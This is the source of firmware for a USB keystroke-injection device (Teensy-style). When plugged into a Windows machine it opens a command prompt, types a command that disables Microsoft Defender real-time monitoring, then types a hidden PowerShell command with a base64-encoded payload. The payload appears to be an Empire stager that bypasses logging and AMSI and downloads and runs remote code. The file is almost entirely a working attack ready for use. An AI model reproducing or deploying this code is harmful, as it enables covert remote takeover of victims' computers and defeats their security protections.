unsigned int lock_check_wait = 1000;
int ledKeys(void) {return int(keyboard_leds);}
boolean isLockOn(void)  {
    return ((ledKeys() & 2) == 2) ? true : false;
}

void clearKeys (){
    delay(200);
    Keyboard.set_key1(0);
    Keyboard.set_key2(0);
    Keyboard.set_key3(0);
    Keyboard.set_key4(0);
    Keyboard.set_key5(0);
    Keyboard.set_key6(0);
    Keyboard.set_modifier(0);
    Keyboard.send_now();
}

void toggleLock(void) {
    Keyboard.set_key1(KEY_CAPS_LOCK);
    Keyboard.send_now();
    clearKeys();
}

void wait_for_drivers(void) {
    boolean numLockTrap = isLockOn();
    while(numLockTrap == isLockOn()) {
        toggleLock();
        delay(lock_check_wait);
    }
    toggleLock();
    delay(lock_check_wait);
}

void win_minWindows(void) {
    delay(300);
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    Keyboard.set_key1(KEY_M);
    Keyboard.send_now();
    clearKeys();
}

void win_restoreWindows(void) {
    delay(300);
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    Keyboard.send_now();
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_SHIFT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_M);
    Keyboard.send_now();
    clearKeys();
}

void win_run(void) {
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    clearKeys();
}

void win_openCmd(void) {
    delay(300);
    win_run();
    Keyboard.print("cmd.exe");
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    clearKeys();
}

void empire(void) {
    //wait_for_drivers();
    win_minWindows();
    delay(1000);
    win_openCmd();
    delay(1000);

    // Disable Microsoft Defender
    Keyboard.print("powershell -Command \"Start-Process PowerShell -ArgumentList '-Command Set-MpPreference -DisableRealtimeMonitoring $true' -Verb RunAs\"");
    sendKey(KEY_ENTER);
    sendKey(KEY_LEFT);
    sendKey(KEY_LEFT);
    sendKey(KEY_ENTER);

    // Launching payload
    Keyboard.print("powershell -W Hidden -nop -noni -enc SQBGACgAJABQAFMAVgBFAHIAUwBJAE8AbgBUAGEAYgBMAGUALgBQAFMAVgBlAFIAUwBJAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBFACAAMwApAHsAJAA0ADIAMABjADMAPQBbAFIAZQBmAF0ALgBBAHMAUwBFAG0AYgBMAHkALgBHAEUAVABUAHkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBlAFQARgBJAGUAYABsAEQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkARgAoACQANAAyADAAQwAzACkAewAkADkAMgA0ADAAQwA9ACQANAAyADAAYwAzAC4ARwBlAFQAVgBBAEwAdQBFACgAJABOAHUATABMACkAOwBJAEYAKAAkADkAMgA0ADAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADkAMgA0ADAAYwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADIANAAwAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJAB2AEEAbAA9AFsAQwBvAGwATABFAGMAdABJAE8AbgBzAC4ARwBFAE4ARQByAGkAYwAuAEQAaQBjAFQAaQBvAG4AYQBSAFkAWwBzAHQAUgBJAG4AZwAsAFMAeQBzAHQAZQBtAC4ATwBiAGoARQBjAHQAXQBdADoAOgBuAEUAVwAoACkAOwAkAFYAYQBsAC4AQQBEAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAHYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOQAyADQAMABjAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAHYAQQBMAH0ARQBsAHMAZQB7AFsAUwBjAFIASQBQAFQAQgBMAG8AYwBLAF0ALgAiAEcARQBUAEYASQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEAbAB1AEUAKAAkAE4AVQBsAGwALAAoAE4AZQB3AC0ATwBiAGoARQBDAHQAIABDAE8ATABsAGUAYwB0AGkAbwBOAFMALgBHAEUATgBlAFIASQBDAC4ASABBAFMASABTAEUAdABbAFMAVAByAEkATgBnAF0AKQApAH0AJABSAEUARgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAeQAuAEcARQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAGEATAB1AEUAKAAkAE4AdQBsAEwALAAkAHQAcgB1AEUAKQA7AH0AOwBbAFMAeQBTAHQARQBNAC4ATgBFAFQALgBTAGUAcgBWAGkAYwBFAFAATwBpAE4AVABNAEEAbgBBAGcARQByAF0AOgA6AEUAWABQAEUAQwBUADEAMAAwAEMATwBuAHQAaQBOAFUARQA9ADAAOwAkADcAMQBlADMAOQA9AE4ARQBXAC0ATwBiAGoAZQBDAHQAIABTAFkAUwBUAGUATQAuAE4AZQBUAC4AVwBlAEIAQwBMAEkARQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQBYAHQALgBFAG4AYwBvAEQAaQBuAGcAXQA6ADoAVQBOAEkAQwBPAGQAZQAuAEcARQBUAFMAVABSAEkATgBnACgAWwBDAE8AbgB2AEUAcgBUAF0AOgA6AEYAcgBPAG0AQgBBAFMARQA2ADQAUwB0AHIASQBOAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANQBBAEQAQQBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQA2AEEARABrAEEATQBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkADcAMQBFADMAOQAuAEgARQBhAEQAZQByAHMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkADcAMQBlADMAOQAuAFAAcgBPAHgAeQA9AFsAUwBZAFMAVABlAG0ALgBOAEUAVAAuAFcAZQBCAFIARQBRAFUAZQBzAFQAXQA6ADoARABFAEYAQQB1AGwAdABXAEUAQgBQAHIATwB4AFkAOwAkADcAMQBFADMAOQAuAFAAcgBvAHgAWQAuAEMAcgBFAGQARQBOAHQAaQBhAEwAUwAgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBFAFQALgBDAFIARQBEAEUATgBUAEkAQQBMAEMAYQBjAGgARQBdADoAOgBEAEUAZgBBAFUAbAB0AE4ARQB0AHcAbwBSAGsAQwByAGUAZABFAG4AVABpAGEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkADcAMQBlADMAOQAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAVABlAE0ALgBUAEUAWABUAC4ARQBOAEMAbwBkAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQBUAEUAUwAoACcAOAAxAGQAYwA5AGIAZABiADUAMgBkADAANABkAGMAMgAwADAAMwA2AGQAYgBkADgAMwAxADMAZQBkADAANQA1ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQANwAxAGUAMwA5AC4ASABlAEEARABFAHIAcwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgB1AGoARQBPAEMATgBLAD0AdABSAFUASgBXAFcAZQBzAGsAQgBuAEoANAA0AG0AUwArAFAASgAvAFYATgBoAGQAcAB0AHMAPQAiACkAOwAkAEQAQQB0AEEAPQAkADcAMQBlADMAOQAuAEQAbwBXAG4ATABvAEEARABEAGEAdABBACgAJABTAEUAcgArACQAdAApADsAJABJAHYAPQAkAGQAYQBUAEEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAEEAPQAkAGQAYQBUAEEAWwA0AC4ALgAkAEQAYQB0AEEALgBsAEUATgBHAHQASABdADsALQBKAG8AaQBuAFsAQwBIAEEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA=="); 
    sendKey(KEY_ENTER);

    clearKeys();
    win_restoreWindows();
}

void setup(void) {
    empire();
}

void sendKey(uint8_t keyin){
  clearKeys();
  Keyboard.set_key1(keyin);
  Keyboard.send_now();
  clearKeys();
  delay(200);
}

void loop() {}
